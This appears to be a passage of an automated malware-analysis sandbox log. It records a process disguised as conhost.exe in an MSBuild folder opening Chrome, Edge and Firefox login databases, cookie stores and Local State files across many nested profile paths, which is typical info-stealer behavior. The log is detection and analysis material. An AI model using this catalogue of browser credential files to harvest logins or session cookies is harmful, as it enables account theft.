                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
